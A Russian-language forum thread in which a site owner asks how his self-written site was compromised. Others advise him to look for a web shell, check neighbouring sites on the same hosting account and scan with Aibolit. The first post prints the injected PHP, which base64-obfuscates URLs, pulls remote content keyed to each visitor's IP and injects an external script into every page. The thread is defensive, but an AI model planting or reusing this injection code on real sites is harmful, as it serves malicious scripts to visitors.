Форум Сайтостроение Веб-строительство

Троян внедрен в исходники

12
KurtRassel
На сайте с 06.04.2013
Offline
45
KurtRassel
1321

Добрый день!

Сегодня зашел на свой сайт и NOD32 обнаружил троян. Он был в скрипте, который подключался внизу страницы.

<script src="http://newdomme.changeip.name/rsize.js"></script>

И в index.php его формировал php скрипт.


function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$file = @fopen ($get, "r");
		$content = @fread($file, 1000);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9uZXdkb21tZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();

Хостинг самый стандартный (jino.ru).

Я сомневаюсь в подборе пароля FTP. Каким образом злоумышленник мог это сделать?

6666
На сайте с 10.01.2005
Offline
505
6666
#1
KurtRassel:
Каким образом злоумышленник мог это сделать?

Погодите, экстрасенсы ушли на перекур. А Вы пока вспоминайте

1. Нажимали ли на непонятные ссылки

2. Ставили ли всякие говноплагины

3. Ставили ли новые шаблоны

И вообще, вспомните какой движок, какая версия, что за сайт. Сколько еще сайтов на хосте, шаред, сервер или чочо.. А какой хостинг - не при чем.

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
Перенос сайта с Wordpress Формирование цены при покупке/продаже Ищу партнера на хостинг
siv1987
На сайте с 02.04.2009
Offline
427
siv1987
#2

KurtRassel, http://www.google.ru/search?hl=ru&newwindow=1&safe=off&site=&source=hp&q=function+collectnewss+site:forum.searchengines.ru&oq=&gs_l= может где-то найдете каким образом злоумышленник мог на вашем сайте это сделать.

KurtRassel
На сайте с 06.04.2013
Offline
45
KurtRassel
#3
6666:
Погодите, экстрасенсы ушли на перекур. А Вы пока вспоминайте

1. Нажимали ли на непонятные ссылки
2. Ставили ли всякие говноплагины
3. Ставили ли новые шаблоны

И вообще, вспомните какой движок, какая версия, что за сайт. Сколько еще сайтов на хосте, шаред, сервер или чочо.. А какой хостинг - не при чем.

1. Непонятные ссылки на своем сайте? - Сомневаюсь.

2. Самописное 500 строчек кода.

3. Самописное 500 строчек кода.

Да на хостинге есть ещё сайты. Какой сайт, не имеет значения, так как я уже скрипт удалил, но если что ВТоп25.ru

Меня интересует, как можно было редактировать файл index.php, на который права стоят 644 😡

Как удалить через ФТП Можно ли редактировать файл Влияет ли возраст сайта
6666
На сайте с 10.01.2005
Offline
505
6666
#4
KurtRassel:
Меня интересует, как можно было редактировать файл index.php, на который права стоят 644

Вирус меняет права в легкую.

KurtRassel:
Непонятные ссылки на своем сайте? - Сомневаюсь.

На чужих...

KurtRassel:
Да на хостинге есть ещё сайты

Через них могли залезть.

KurtRassel
На сайте с 06.04.2013
Offline
45
KurtRassel
#5

Да, действительно, все сайты на моем хостинге заражены.

У всех index.php внедрен скрипт вчера в 23:25

Почистил. Может ли это быть проблема со стороны хостинга?

6666
На сайте с 10.01.2005
Offline
505
6666
#6
KurtRassel:
так как я уже скрипт удалил

Скрипт фигня. Ищите шелл, который его прописывает.

KurtRassel:
но если что ВТоп25.ru

Авторизация ВК? Ну-ну..

---------- Добавлено 21.05.2013 в 16:22 ----------

KurtRassel:
Может ли это быть проблема со стороны хостинга?

0.5% вероятности.

KurtRassel
На сайте с 06.04.2013
Offline
45
KurtRassel
#7
siv1987:
KurtRassel, http://www.google.ru/search?hl=ru&newwindow=1&safe=off&site=&source=hp&q=function+collectnewss+site:forum.searchengines.ru&oq=&gs_l= может где-то найдете каким образом злоумышленник мог на вашем сайте это сделать.

Да, прочитал. Он я смотрю популярен.

---------- Добавлено 21.05.2013 в 16:28 ----------

6666:
Скрипт фигня. Ищите шелл, который его прописывает.

Каким образом? Скрытых файлов нет. Какого формата он должен быть?

6666:
Авторизация ВК? Ну-ну..

Дуров обещал, что это безопасно ... =)

6666
На сайте с 10.01.2005
Offline
505
6666
#8
KurtRassel:
Дуров обещал, что это безопасно

Это предположение. Может и не там дыра.

KurtRassel:
Каким образом?

Ну читайте прилепленный топик. Качайте айболита. И проверяйте все сайты по-полной.

Айболит, к сожалению, не всегда и не все находит, но лучше нету.

KurtRassel
На сайте с 06.04.2013
Offline
45
KurtRassel
#9
6666:
Ну читайте прилепленный топик. Качайте айболита. И проверяйте все сайты по-полной.
Айболит, к сожалению, не всегда и не все находит, но лучше нету.

Уяснил ... спасибо попробую. Буду следить.

bbon
На сайте с 01.04.2006
Offline
168
bbon
#10
KurtRassel:
Меня интересует, как можно было редактировать файл index.php, на который права стоят 644 😡

кто вас ввёл в заблуждение, что с правами 644 файл становится нередактируемым? 😕 Если вредоносный процесс от имени овнера файла - то как раз можно.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий